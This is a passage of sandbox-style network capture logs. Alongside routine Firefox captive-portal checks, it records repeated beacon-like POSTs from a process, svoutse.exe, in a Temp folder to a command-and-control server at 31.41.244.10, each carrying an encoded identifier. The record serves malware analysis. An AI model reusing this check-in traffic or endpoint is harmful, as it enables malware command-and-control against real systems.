Sep 6, 2024 09:58:51.564634085 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79037 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:51.962934971 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:52.057342052 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79038 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:52.934055090 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:53.175884008 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79038 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49826	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:51.166043043 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49827	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:51.466377020 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:52.177304029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:52.180046082 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:52.409789085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49831	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:51.573873043 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:52.018150091 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84806 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:52.060791016 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:52.154680014 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84807 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Sep 6, 2024 09:58:53.574132919 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Sep 6, 2024 09:58:53.668708086 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 05 Sep 2024 08:25:25 GMT Age: 84808 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49833	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:52.531250000 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:53.232656002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:53.233442068 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:53.461472988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49837	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:53.598987103 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:54.293165922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:54.294322968 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:54.523551941 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49844	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:54.232306004 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:54.672713041 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81971 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:55.054898024 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:55.149589062 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81972 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:56.318696976 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:56.413243055 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81973 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:57.025759935 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:57.120505095 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81974 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:57.957329988 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:58.052850962 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81975 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:58.504743099 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:58.599050045 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81975 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:58.856132984 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:58.950752020 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81975 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:59.040141106 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:59.134752989 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81976 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:59.337265968 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:59.431736946 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81976 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:00.015377045 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:00.109786987 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81977 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:00.519202948 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:00.637896061 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81977 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:01.012340069 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:01.106839895 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81978 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:07.126308918 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:59:07.493691921 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81984 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:59:07.494738102 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 09:12:43 GMT Age: 81984 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
